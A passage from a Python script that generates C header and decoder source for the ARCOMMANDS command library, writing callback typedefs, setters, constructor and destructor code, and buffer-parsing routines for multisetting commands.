'NewDecoder') + ' (' + AREnumName (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME) + ' *error);\n') hfile.write ('\n') hfile.write ('/**\n') hfile.write (' * @brief Deletes an ARCOMMANDS_Decoder_t\n') hfile.write (' * @param decoder The Decoder to delete.\n') hfile.write (' */\n') hfile.write ('void ' + ARFunctionName (LIB_MODULE, DEC_SUBMODULE, 'DeleteDecoder') + ' (ARCOMMANDS_Decoder_t **decoder);\n') hfile.write ('\n') hfile.write ('/**\n') hfile.write (' * @brief Decode a comand\n') hfile.write (' * On success, the callback set for the command will be called in the current thread.\n') hfile.write (' * @param decoder the decoder instance\n') hfile.write (' * @param buffer the command buffer to decode\n') hfile.write (' * @param buffLen the length of the command buffer\n') hfile.write (' * @return ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ' on success, any error code otherwise\n') hfile.write (' */\n') hfile.write (AREnumName (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME) + '\n') hfile.write (ARFunctionName (LIB_MODULE, DEC_SUBMODULE, 'DecodeCommand') + ' (ARCOMMANDS_Decoder_t *decoder, const uint8_t *buffer, int32_t buffLen);\n') hfile.write ('\n') hfile.write ('/**\n') hfile.write (' * @brief Decode a comand buffer\n') hfile.write (' * On success, the callback set for the command will be called in the current thread.\n') hfile.write (' * @param buffer the command buffer to decode\n') hfile.write (' * @param buffLen the length of the command buffer\n') hfile.write (' * @return ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ' on success, any error code otherwise\n') hfile.write (' */\n') hfile.write (AREnumName (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME) + '\n') hfile.write (ARFunctionName (LIB_MODULE, DEC_SUBMODULE, 'DecodeBuffer') + ' (const uint8_t *buffer, int32_t buffLen) DEPRECATED;\n') hfile.write ('\n') hfile.write ('\n/**\n') hfile.write (' * @brief Describe a comand buffer\n') hfile.write (' * @param buffer the command buffer to decode\n') hfile.write (' * @param buffLen the length of the command buffer\n') hfile.write (' * @param resString the string pointer in which the description will be stored\n') hfile.write (' * @param stringLen the length of the string pointer\n') hfile.write (' * @return ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ' on success, any error code otherwise\n') hfile.write (' */\n') hfile.write (AREnumName (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME) + '\n') hfile.write (ARFunctionName (LIB_MODULE, DEC_SUBMODULE, 'DescribeBuffer') + ' (uint8_t *buffer, int32_t buffLen, char *resString, int32_t stringLen);\n') hfile.write ('\n') for ftr in allFeatures: hfile.write ('// Feature ' + get_ftr_old_name(ftr) + '\n\n') for cmd in ftr.cmds + ftr.evts: for multiset_arg in [arg for arg in cmd.args if isinstance(arg.argType, ArMultiSetting)]: hfile.write ('/**\n') hfile.write (' * @brief Decode a '+ARTypeName (LIB_MODULE, get_ftr_old_name(ftr), multiset_arg.argType.name)+'\n') hfile.write (' * On success, the callback set for each commands of the multisetting will be called in the current thread.\n') hfile.write (' * @param decoder the decoder instance\n') hfile.write (' * @param multisetting the multisetting to decode\n') hfile.write (' * @return ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ' on success, any error code otherwise\n') hfile.write (' */\n') hfile.write (AREnumName (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME) + '\n') hfile.write (ARFunctionName (LIB_MODULE, DEC_SUBMODULE, 'Decode'+ARCapitalize(ftr.name)+ARCapitalize(cmd.name)) + ' (ARCOMMANDS_Decoder_t *decoder, '+xmlToC(LIB_MODULE, ftr, cmd, multiset_arg, True)+' multisetting);\n') hfile.write ('\n') brefCmdName = cmd.name if cmd.cls is None else cmd.cls.name + '.' + cmd.name hfile.write ('\n/**\n') hfile.write (' * @brief callback type for the command ' + get_ftr_old_name(ftr) + '.' + brefCmdName + '\n') hfile.write (' */\n') hfile.write ('typedef void (*' + ARTypeName (LIB_MODULE, DEC_SUBMODULE, ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + 'Callback') + ') (') first = True for arg in cmd.args: if first: first = False else: hfile.write (', ') hfile.write (xmlToCcharAreConst (LIB_MODULE, ftr, cmd, arg, True) + ' ' + arg.name) if not first: hfile.write (', ') hfile.write ('void *custom);\n') hfile.write ('/**\n') hfile.write (' * @brief Set Decoder callback setter for the command ' + get_ftr_old_name(ftr) + '.' + brefCmdName + '\n') hfile.write (' * @param decoder the decoder instance\n') hfile.write (' * @param callback new callback for the command ' + get_ftr_old_name(ftr) + '.' + brefCmdName + '\n') hfile.write (' * @param custom pointer that will be passed to all calls to the callback\n') hfile.write (' */\n') hfile.write ('void ' + ARFunctionName (LIB_MODULE, DEC_SUBMODULE, 'Set' + ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + 'Cb') + ' (ARCOMMANDS_Decoder_t *decoder, ' + ARTypeName (LIB_MODULE, DEC_SUBMODULE, ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + 'Callback') + ' callback, void *custom);\n') hfile.write ('/**\n') hfile.write (' * @brief callback setter for the command ' + get_ftr_old_name(ftr) + '.' + brefCmdName + '\n') hfile.write (' * @param callback new callback for the command ' + get_ftr_old_name(ftr) + '.' + brefCmdName + '\n') hfile.write (' * @param custom pointer that will be passed to all calls to the callback\n') hfile.write (' */\n') hfile.write ('void ' + ARFunctionName (LIB_MODULE, DEC_SUBMODULE, 'Set' + ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + 'Callback') + ' (' + ARTypeName (LIB_MODULE, DEC_SUBMODULE, ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + 'Callback') + ' callback, void *custom) DEPRECATED;\n') hfile.write ('\n') hfile.write ('#endif /* ' + COMMANDSDEC_DEFINE + ' */\n') hfile.close () ################################# # 8TH PART : # ################################# # Generate decoder C part # ################################# cfile = open (paths.COMMANDSDEC_CFILE, 'w') cfile.write (LICENCE_HEADER) cfile.write ('/********************************************\n') cfile.write (' * AUTOGENERATED FILE *\n') cfile.write (' * DO NOT MODIFY IT *\n') cfile.write (' * *\n') cfile.write (' * To add new commands : *\n') cfile.write (' * - Modify ../Xml/commands.xml file *\n') cfile.write (' * - Re-run generateCommandsList.py script *\n') cfile.write (' * *\n') cfile.write (' ********************************************/\n') cfile.write ('#include <config.h>\n') cfile.write ('#include <stdio.h>\n') cfile.write ('#include "' + COMMANDSRW_HFILE_NAME + '"\n') cfile.write ('#include <' + COMMANDSTYPES_HFILE_NAME + '>\n') cfile.write ('#include <' + COMMANDSDEC_HFILE_NAME + '>\n') cfile.write ('#include <' + COMMANDSID_HFILE_NAME + '>\n') cfile.write ('#include <libARSAL/ARSAL_Mutex.h>\n') cfile.write ('\n') cfile.write ('// ARCOMMANDS_Decoder_t structure definition\n') cfile.write ('struct ARCOMMANDS_Decoder_t\n') cfile.write ('{\n') cfile.write (' ARSAL_Mutex_t mutex;\n\n') for ftr in allFeatures: cfile.write (' // Feature ' + get_ftr_old_name(ftr) + '\n') for cmd in ftr.cmds + ftr.evts: cfile.write(' ' + ARTypeName (LIB_MODULE, DEC_SUBMODULE, ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + 'Callback') + ' ' + ARCapitalize(get_ftr_old_name(ftr)) + ARCapitalize(format_cmd_name(cmd)) + 'Callback;\n') cfile.write(' void *' + ARCapitalize(get_ftr_old_name(ftr)) + ARCapitalize(format_cmd_name(cmd)) + 'Custom;\n'); cfile.write ('\n') cfile.write ('};\n') cfile.write ('\n') cfile.write ('\n') cfile.write ('// Constructor\n') cfile.write ('ARCOMMANDS_Decoder_t* ' + ARFunctionName (LIB_MODULE, DEC_SUBMODULE, 'NewDecoder') + ' (' + AREnumName (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME) + ' *error)\n') cfile.write ('{\n') cfile.write (' ARCOMMANDS_Decoder_t *decoder = NULL;\n') cfile.write (' int err = 0;\n') cfile.write ('\n') cfile.write (' decoder = calloc(1, sizeof(*decoder));\n') cfile.write (' if (decoder == NULL)\n') cfile.write (' goto end;\n') cfile.write ('\n') cfile.write (' err = ARSAL_Mutex_Init (&decoder->mutex);\n') cfile.write (' if (err != 0) {\n') cfile.write (' free(decoder);\n') cfile.write (' decoder = NULL;\n') cfile.write (' }\n') cfile.write ('\n') cfile.write ('end:\n') cfile.write (' if (error)\n') cfile.write (' *error = decoder ? ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ' : ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'ERROR') + ';\n') cfile.write ('\n'); cfile.write (' return decoder;\n') cfile.write ('}\n\n') cfile.write ('// Destructor\n') cfile.write ('void ' + ARFunctionName (LIB_MODULE, DEC_SUBMODULE, 'DeleteDecoder') + ' (ARCOMMANDS_Decoder_t **decoder)\n') cfile.write ('{\n') cfile.write (' if (decoder && (*decoder)) {\n'); cfile.write (' ARSAL_Mutex_Destroy(&(*decoder)->mutex);\n') cfile.write (' free(*decoder);\n'); cfile.write (' *decoder = NULL;\n'); cfile.write (' }\n'); cfile.write ('}\n\n') cfile.write ('// CALLBACK VARIABLES + SETTERS\n') cfile.write ('\n') cfile.write ('static ARSAL_Mutex_t ' + ARGlobalName (LIB_MODULE, DEC_SUBMODULE, 'mutex') + ';\n') cfile.write ('static int ' + ARGlobalName (LIB_MODULE, DEC_SUBMODULE, 'isInit') + ' = 0;\n') cfile.write ('static int ' + ARFunctionName (LIB_MODULE, DEC_SUBMODULE, 'Init') + ' (void)\n') cfile.write ('{\n') cfile.write (' if ((' + ARGlobalName (LIB_MODULE, DEC_SUBMODULE, 'isInit') + ' == 0) &&\n') cfile.write (' (ARSAL_Mutex_Init (&' + ARGlobalName (LIB_MODULE, DEC_SUBMODULE, 'mutex') + ') == 0))\n') cfile.write (' {\n') cfile.write (' ' + ARGlobalName (LIB_MODULE, DEC_SUBMODULE, 'isInit') + ' = 1;\n') cfile.write (' } // No else --> Do nothing if already initialized\n') cfile.write (' return ' + ARGlobalName (LIB_MODULE, DEC_SUBMODULE, 'isInit') + ';\n') cfile.write ('}\n') cfile.write ('\n') for ftr in allFeatures: cfile.write ('// Feature ' + get_ftr_old_name(ftr) + '\n\n') for cmd in ftr.cmds + ftr.evts: for multiset_arg in [arg for arg in cmd.args if isinstance(arg.argType, ArMultiSetting)]: cfile.write (AREnumName (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME) + '\n') cfile.write (ARFunctionName (LIB_MODULE, DEC_SUBMODULE, 'Decode'+ARCapitalize(ftr.name)+ARCapitalize(cmd.name)) + ' (ARCOMMANDS_Decoder_t *decoder, '+xmlToC(LIB_MODULE, ftr, cmd, multiset_arg, True)+' multisetting)\n') cfile.write ('{\n') cfile.write (' ' + AREnumName (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME) + ' retVal = ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ';\n') cfile.write (' if ((NULL == decoder) ||\n') cfile.write (' (NULL == multisetting))\n') cfile.write (' {\n') cfile.write (' retVal = ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'ERROR') + ';\n') cfile.write (' } // No else --> Arg check\n') cfile.write (' \n') cfile.write (' if (retVal == ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ')\n') cfile.write (' {\n') for multiset_msg in multiset_arg.argType.msgs: if multiset_msg.cls: DECODER_CBNAME = ARCapitalize (get_ftr_old_name(multiset_msg.ftr)) + ARCapitalize (multiset_msg.cls.name) + ARCapitalize (multiset_msg.name) + 'Callback' DECODER_CBCUSTOMNAME = ARCapitalize (get_ftr_old_name(multiset_msg.ftr)) + ARCapitalize (multiset_msg.cls.name) + ARCapitalize (multiset_msg.name) + 'Custom' else: DECODER_CBNAME = ARCapitalize (get_ftr_old_name(multiset_msg.ftr)) + ARCapitalize (multiset_msg.name) + 'Callback' DECODER_CBCUSTOMNAME = ARCapitalize (get_ftr_old_name(multiset_msg.ftr)) + ARCapitalize (multiset_msg.name) + 'Custom' cfile.write (' if ((multisetting->'+multiset_msg.name+'.isSet) && (decoder->' + DECODER_CBNAME + ')) {\n') cfile.write (' decoder->' + DECODER_CBNAME + ' (') first = True for arg in multiset_msg.args: if first: first = False else: cfile.write (', ') cfile.write ('multisetting->'+multiset_msg.name+'.' + arg.name) if not first: cfile.write (', ') cfile.write ('decoder->' + DECODER_CBCUSTOMNAME + ');\n') cfile.write (' }\n') cfile.write (' }\n') cfile.write (' return retVal;\n') cfile.write ('}\n') cfile.write ('\n') cfile.write ('void ' + ARFunctionName (LIB_MODULE, DEC_SUBMODULE, 'Set' + ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + 'Cb') + ' (ARCOMMANDS_Decoder_t *decoder, ' + ARTypeName (LIB_MODULE, DEC_SUBMODULE, ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + 'Callback') + ' callback, void *custom)\n') cfile.write ('{\n') cfile.write (' if (!decoder)\n') cfile.write (' return;\n') cfile.write ('\n') cfile.write (' ARSAL_Mutex_Lock (&decoder->mutex);\n') cfile.write (' decoder->' + ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + 'Callback = callback;\n') cfile.write (' decoder->' + ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + 'Custom = custom;\n') cfile.write (' ARSAL_Mutex_Unlock (&decoder->mutex);\n') cfile.write ('}\n\n') cfile.write ('static ' + ARTypeName (LIB_MODULE, DEC_SUBMODULE, ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + 'Callback') + ' ' + ARGlobalName (LIB_MODULE, DEC_SUBMODULE, ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + 'Cb') + ' = NULL;\n') cfile.write ('static void *' + ARGlobalName (LIB_MODULE, DEC_SUBMODULE, ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + 'Custom') + ' = NULL;\n') cfile.write ('void ' + ARFunctionName (LIB_MODULE, DEC_SUBMODULE, 'Set' + ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + 'Callback') + ' (' + ARTypeName (LIB_MODULE, DEC_SUBMODULE, ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + 'Callback') + ' callback, void *custom)\n') cfile.write ('{\n') cfile.write (' if (' + ARFunctionName (LIB_MODULE, DEC_SUBMODULE, 'Init') + ' () == 1)\n') cfile.write (' {\n') cfile.write (' ARSAL_Mutex_Lock (&' + ARGlobalName (LIB_MODULE, DEC_SUBMODULE, 'mutex') + ');\n') cfile.write (' ' + ARGlobalName (LIB_MODULE, DEC_SUBMODULE, ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + 'Cb') + ' = callback;\n') cfile.write (' ' + ARGlobalName (LIB_MODULE, DEC_SUBMODULE, ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + 'Custom') + ' = custom;\n') cfile.write (' ARSAL_Mutex_Unlock (&' + ARGlobalName (LIB_MODULE, DEC_SUBMODULE, 'mutex') + ');\n') cfile.write (' } // No else --> do nothing if library can not be initialized\n') cfile.write ('}\n') cfile.write ('\n') for ftr in allFeatures: for cmd in [cmdx for cmdx in ftr.cmds + ftr.evts if cmdx.args]: cfile.write ('static ' +AREnumName (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME) +' '+ ARFunctionName (LIB_MODULE, DEC_SUBMODULE, ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + 'DecodeArgs') + ' (const uint8_t *buffer, int32_t buffLen, int32_t *offset') for arg in cmd.args: cfile.write (', '+ xmlToCcharAreConst (LIB_MODULE, ftr, cmd, arg) +' *_' + arg.name) cfile.write (');\n') cfile.write ('static ' +AREnumName (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME) +' '+ ARFunctionName (LIB_MODULE, DEC_SUBMODULE, ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + 'DescribeArgs') + ' (uint8_t *buffer, int32_t buffLen, int32_t *offset, char *resString, int32_t strLen, int32_t *strOffset);\n') cfile.write ('\n') for ftr in allFeatures: for cmd in [cmdx for cmdx in ftr.cmds + ftr.evts if cmdx.args]: cfile.write ('static ' +AREnumName (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME) +' '+ ARFunctionName (LIB_MODULE, DEC_SUBMODULE, ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + 'DecodeArgs') + ' (const uint8_t *buffer, int32_t buffLen, int32_t *offset') for arg in cmd.args: cfile.write (', '+ xmlToCcharAreConst (LIB_MODULE, ftr, cmd, arg) +' *_' + arg.name) cfile.write (')\n') cfile.write ('{\n') cfile.write (' ' +AREnumName (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME) +' retVal = ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ';\n') cfile.write (' int32_t error = 0;\n') hasMutiSet = bool([arg for arg in cmd.args if isinstance(arg.argType, ArMultiSetting)]) if hasMutiSet: cfile.write (' eARCOMMANDS_ID_FEATURE commandFeature = -1;\n') cfile.write (' int commandClass = -1;\n') cfile.write (' int commandId = -1;\n') cfile.write (' uint16_t multisetSize = 0;\n') cfile.write (' int32_t multisetEnd = 0;\n') cfile.write (' uint16_t cmdSize = 0;\n') cfile.write ('\n') cfile.write (' if ((NULL == buffer)') for arg in cmd.args: cfile.write (' ||\n (NULL == _' + arg.name+')') cfile.write (')\n') cfile.write (' {\n') cfile.write (' retVal = ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'ERROR') + ';\n') cfile.write (' } // No else --> Arg check\n') cfile.write ('\n') for arg in cmd.args: if isinstance(arg.argType, ArMultiSetting): cfile.write (' if (retVal == ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ')\n') cfile.write (' {\n') cfile.write (' memset(_' + arg.name+', 0, sizeof(*_' + arg.name+'));\n') cfile.write (' multisetSize = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'Read16FromBuffer') + ' (buffer, buffLen, offset, &error);\n') cfile.write (' if (error == 1)\n') cfile.write (' {\n') cfile.write (' retVal = '+ AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'NOT_ENOUGH_DATA') + ';\n') cfile.write (' } // No else --> Do not modify retVal if read went fine\n') cfile.write (' } // No else --> Processing block\n') cfile.write ('\n') cfile.write (' if (retVal == '+ AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ')\n') cfile.write (' {\n') cfile.write (' multisetEnd = *offset + multisetSize;\n') cfile.write (' cmdSize = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'Read16FromBuffer') + ' (buffer, buffLen, offset, &error);\n') cfile.write (' if (error == 1)\n') cfile.write (' {\n') cfile.write (' retVal = '+ AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'NOT_ENOUGH_DATA') + ';\n') cfile.write (' } // No else --> Do not modify retVal if read went fine\n') cfile.write (' } // No else --> Processing block\n') cfile.write ('\n') cfile.write (' while ((retVal == '+ AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ') &&\n') cfile.write (' (*offset < multisetEnd))\n') cfile.write (' {\n') cfile.write (' if (retVal == '+ AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ')\n') cfile.write (' {\n') cfile.write (' commandFeature = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'Read8FromBuffer') + ' (buffer, buffLen, offset, &error);\n') cfile.write (' if (error == 1)\n') cfile.write (' {\n') cfile.write (' retVal = '+ AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'NOT_ENOUGH_DATA') + ';\n') cfile.write (' } // No else --> Do not modify retVal if read went fine\n') cfile.write (' } // No else --> Processing block\n') cfile.write ('\n') cfile.write (' if (retVal == '+ AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ')\n') cfile.write (' {\n') cfile.write (' commandClass = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'Read8FromBuffer') + ' (buffer, buffLen, offset, &error);\n') cfile.write (' if (error == 1)\n') cfile.write (' {\n') cfile.write (' retVal = '+ AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'NOT_ENOUGH_DATA') + ';\n') cfile.write (' } // No else --> Do not modify retVal if read went fine\n') cfile.write (' } // No else --> Processing block\n') cfile.write ('\n') cfile.write (' if (retVal == '+ AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ')\n') cfile.write (' {\n') cfile.write (' commandId = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'Read16FromBuffer') + ' (buffer, buffLen, offset, &error);\n') cfile.write (' if (error == 1)\n') cfile.write (' {\n') cfile.write (' retVal = '+ AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'NOT_ENOUGH_DATA') + ';\n') cfile.write (' } // No else --> Do not modify retVal if read went fine\n') cfile.write (' } // No else --> Processing block\n') cfile.write ('\n') cfile.write (' if (retVal == '+ AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ')\n') cfile.write (' {\n') cfile.write (' switch (commandFeature)\n') cfile.write (' {\n') #regroup multisetting msgs by feature and by class multiset_sorted = {} for multiset_msg in arg.argType.msgs: multiset_cl = multiset_msg.cls if multiset_msg.cls else ArClass('defaultCls', 0, '') if not multiset_msg.ftr in multiset_sorted: multiset_sorted[multiset_msg.ftr] = {} if not multiset_cl in multiset_sorted[multiset_msg.ftr]: multiset_sorted[multiset_msg.ftr][multiset_cl] = [] multiset_sorted[multiset_msg.ftr][multiset_cl].append(multiset_msg) get_name = lambda x: x.name for multiset_ftr in sorted(multiset_sorted.keys(), key=get_name): cfile.write (' case ' + AREnumValue (LIB_MODULE, ID_SUBMODULE, 'FEATURE', get_ftr_old_name(multiset_ftr)) + ':\n') cfile.write (' switch (commandClass)\n') cfile.write (' {\n') for multiset_cl in sorted(multiset_sorted[multiset_ftr].keys(), key=get_name): cfile.write (' case ' + AREnumValue (LIB_MODULE, ID_SUBMODULE, get_ftr_old_name(multiset_ftr) + '_CLASS', multiset_cl.name) + ':\n') cfile.write (' switch (commandId)\n') cfile.write (' {\n') for multiset_msg in multiset_sorted[multiset_ftr][multiset_cl]: cfile.write (' case ' + AREnumValue (LIB_MODULE, ID_SUBMODULE, get_ftr_old_name(multiset_ftr) + '_' + multiset_cl.name + '_CMD', multiset_msg.name) + ':\n') cfile.write (' retVal = '+ ARFunctionName (LIB_MODULE, DEC_SUBMODULE, ARCapitalize (get_ftr_old_name(multiset_ftr)) + ARCapitalize (format_cmd_name(multiset_msg)) + 'DecodeArgs') + '(buffer, buffLen, offset') for multiset_msg_arg in multiset_msg.args: cfile.write (', &_' + arg.name+'->'+multiset_msg.name+'.' + multiset_msg_arg.name) cfile.write (');\n') cfile.write (' if (retVal == '+ AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ')\n') cfile.write (' {\n') cfile.write (' _' + arg.name+'->'+multiset_msg.name+'.isSet = 1;\n') cfile.write (' }\n') cfile.write (' break;\n') cfile.write (' default:\n') cfile.write (' // Command unknown\n') cfile.write (' *offset += cmdSize;\n') cfile.write (' break;\n') cfile.write (' }\n') cfile.write (' break;\n') cfile.write (' default:\n') cfile.write (' // Command unknown\n') cfile.write (' *offset += cmdSize;\n') cfile.write (' break;\n') cfile.write (' }\n') cfile.write (' break;\n') cfile.write (' default:\n') cfile.write (' // Command unknown\n') cfile.write (' *offset += cmdSize;\n') cfile.write (' break;\n') cfile.write (' }\n') cfile.write (' }\n') cfile.write ('\n') cfile.write (' if ((retVal == ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ') &&\n') cfile.write (' (*offset < multisetEnd))\n') cfile.write (' {\n') cfile.write (' cmdSize = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'Read16FromBuffer') + ' (buffer, buffLen, offset, &error);\n') cfile.write (' if (error == 1)\n') cfile.write (' {\n') cfile.write (' retVal = '+ AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'NOT_ENOUGH_DATA') + ';\n') cfile.write (' } // No else --> Do not modify retVal if read went fine\n') cfile.write (' }\n') cfile.write (' }\n') else: cfile.write (' if (retVal == ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ')\n') cfile.write (' {\n') cfile.write (' *_' + arg.name + ' = ' + xmlToReader (ftr, cmd, arg) + ' (buffer, buffLen, offset, &error);\n') cfile.write (' if (error == 1)\n') cfile.write (' {\n') cfile.write (' retVal = ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'NOT_ENOUGH_DATA') + ';\n') cfile.write (' } // No else --> Do not modify retVal if read went fine\n') cfile.write (' } // No else --> Processing block\n') cfile.write (' return retVal;\n') cfile.write ('}\n') cfile.write ('\n') cfile.write ('static ' +AREnumName (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME) +' '+ ARFunctionName (LIB_MODULE, DEC_SUBMODULE, ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + 'DescribeArgs') + ' (uint8_t *buffer, int32_t buffLen, int32_t *offset, char *resString, int32_t strLen, int32_t *strOffset)\n') cfile.write ('{\n') cfile.write (' int32_t error = 0;\n') hasMutiSet = bool([arg for arg in cmd.args if isinstance(arg.argType, ArMultiSetting)]) if hasMutiSet: cfile.write (' eARCOMMANDS_ID_FEATURE commandFeature = -1;\n') cfile.write (' int commandClass = -1;\n') cfile.write (' int commandId = -1;\n') cfile.write (' uint16_t multisetSize = 0;\n') cfile.write (' int32_t multisetEnd = 0;\n') cfile.write (' uint16_t cmdSize = 0;\n') cfile.write (' ' + AREnumName (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME) + ' retVal = ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ';\n') cfile.write ('\n') cfile.write (' if ((NULL == buffer) || (NULL == resString))\n') cfile.write (' {\n') cfile.write (' retVal = ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'ERROR') + ';\n') cfile.write (' } // No else --> Arg check\n') cfile.write ('\n') for arg in cmd.args: if isinstance(arg.argType, ArMultiSetting): cfile.write (' if (retVal == '+ AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ')\n') cfile.write (' {\n') cfile.write (' multisetSize = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'Read16FromBuffer') + ' (buffer, buffLen, offset, &error);\n') cfile.write (' if (error == 1)\n') cfile.write (' {\n') cfile.write (' retVal = '+ AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'NOT_ENOUGH_DATA') + ';\n') cfile.write (' } // No else --> Do not modify retVal if read went fine\n') cfile.write (' } // No else --> Processing block\n') cfile.write ('\n') cfile.write (' if (retVal == '+ AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ')\n') cfile.write (' {\n') cfile.write (' multisetEnd = *offset + multisetSize;\n') cfile.write (' cmdSize = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'Read16FromBuffer') + ' (buffer, buffLen, offset, &error);\n') cfile.write (' if (error == 1)\n') cfile.write (' {\n') cfile.write (' retVal = '+ AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'NOT_ENOUGH_DATA') + ';\n') cfile.write (' } // No else --> Do not modify retVal if read went fine\n') cfile.write (' } // No else --> Processing block\n') cfile.write ('\n') cfile.write (' if (retVal == '+ AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ')\n') cfile.write (' {\n') cfile.write (' *strOffset = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'WriteString') + ' ("{", resString, strLen, *strOffset) ;\n') cfile.write (' if (*strOffset < 0)\n') cfile.write (' {\n') cfile.write (' retVal = ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'NOT_ENOUGH_SPACE') + ';\n') cfile.write (' } // No else --> Do not modify retVal if no error occured\n') cfile.write (' } // No else --> Processing block\n') cfile.write ('\n') cfile.write (' while ((retVal == '+ AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ') &&\n') cfile.write (' (*offset < multisetEnd))\n') cfile.write (' {\n') cfile.write (' if (retVal == '+ AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + 